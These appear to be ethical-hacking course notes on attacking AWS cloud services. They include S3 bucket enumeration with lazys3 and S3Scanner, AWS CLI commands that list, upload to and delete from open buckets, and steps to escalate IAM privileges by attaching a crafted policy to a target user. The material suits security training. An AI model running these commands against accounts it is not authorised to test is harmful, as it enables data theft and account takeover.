Cloud Computing
Cloud computing delivers various types of services and applications over the Internet. These services enable users to use software and hardware managed by third parties at remote locations. Some well-known cloud service providers are Google, Amazon, and Microsoft.
verview of Cloud Computing
Cloud computing refers to on-demand delivery of IT capabilities, in which IT infrastructure and applications are provided to subscribers as metered services over a network. Cloud services are classified into three categories, namely infrastructure-as-a-service (IaaS), platform-as-a-service (PaaS), and software-as-a-service (SaaS), which offer different techniques for developing cloud.
Enumerate S3 Buckets using lazys3
lazys3 is a Ruby script tool that is used to brute-force AWS S3 buckets using different permutations. This tool obtains the publicly accessible S3 buckets and also allows you to search the S3 buckets of a specific company by entering the company name.
ruby lazys3.rb [Company]
Enumerate S3 Buckets using S3Scanner
S3Scanner is a tool that finds the open S3 buckets and dumps their contents. It takes a list of bucket names to check as its input. The S3 buckets that are found are output to a file. The tool also dumps or lists the contents of “open” buckets locally.
python3 ./s3scanner.py sites.txt
Dump all open buckets and log both open and closed buckets in found.txt:
python3 ./s3scanner.py --include-closed --out-file found.txt --dump names.txt
Just log open buckets in the default output file (buckets.txt):
python3 ./s3scanner.py names.txt
Save the file listings of all open buckets to a file:
python ./s3scanner.py --list names.txt
S3 buckets are used by customers and end users to store text documents, PDFs, videos, images, etc. To store all these data, the user needs to create a bucket with a unique name.
Listed below are several techniques that can be adopted to identify AWS S3 Buckets:
Inspecting HTML: Analyze the source code of HTML web pages in the background to find URLs to the target S3 buckets
Brute-Forcing URL: Use Burp Suite to perform a brute-force attack on the target bucket’s URL to identify its correct URL
Finding subdomains: Use tools such as Findsubdomains and Robtex to identify subdomains related to the target bucket
Reverse IP Search: Use search engines such as Bing to perform reverse IP search to identify the domains of the target S3 buckets
Advanced Google hacking: Use advanced Google search operators such as “inurl” to search for URLs related to the target S3 buckets
Exploit Open S3 Buckets using AWS CLI
The AWS command line interface (CLI) is a unified tool for managing AWS services. With just one tool to download and configure, you can control multiple AWS services from the command line and automate them through scripts.
aws configure
It will ask for the following details:
AWS Access Key ID
AWS Secret Access Key
Default region name
Default output format
aws s3 ls s3://[Bucket Name]
aws s3 mv Hack.txt s3://certifiedhacker1
aws s3 rm s3://certifiedhacker1/Hack.txt
Overview of Privilege Escalation
Privileges are security roles assigned to users for using specific programs, features, OSes, functions, files, code, etc. to limit access depending on the type of user. Privilege escalation is required when you want to access system resources that you are not authorized to access. It takes place in two forms: vertical and horizontal.
Horizontal Privilege Escalation: An unauthorized user tries to access the resources, functions, and other privileges of an authorized user who has similar access permissions
Vertical Privilege Escalation: An unauthorized user tries to access the resources and functions of a user with higher privileges such as application or site administrators
Escalate IAM User Privileges by Exploiting Misconfigured User Policy
A policy is an entity that, when attached to an identity or resource, defines its permissions. You can use the AWS Management Console, AWS CLI, or AWS API to create customer-managed policies in IAM. Customer-managed policies are standalone policies that you administer in your AWS account. You can then attach the policies to the identities (users, groups, and roles) in your AWS account. If the user policies are not configured properly, they can be exploited by attackers to gain full administrator access to the target user’s AWS account.
aws iam create-policy --policy-name user-policy --policy-document file://user-policy.json
user-policy.json
aws iam attach-user-policy --user-name [Target Username] --policy-arn arn:aws:iam::[Account ID]:policy/user-policy
aws iam list-attached-user-policies --user-name [Target Username]
aws iam list-users
List of S3 buckets:
aws s3api list-buckets --query "Buckets[].Name"
User Policies:
aws iam list-user-policies
Role Policies:
aws iam list-role-policies
Group policies:
aws iam list-group-policies
Create user:
aws iam create-user
Last updated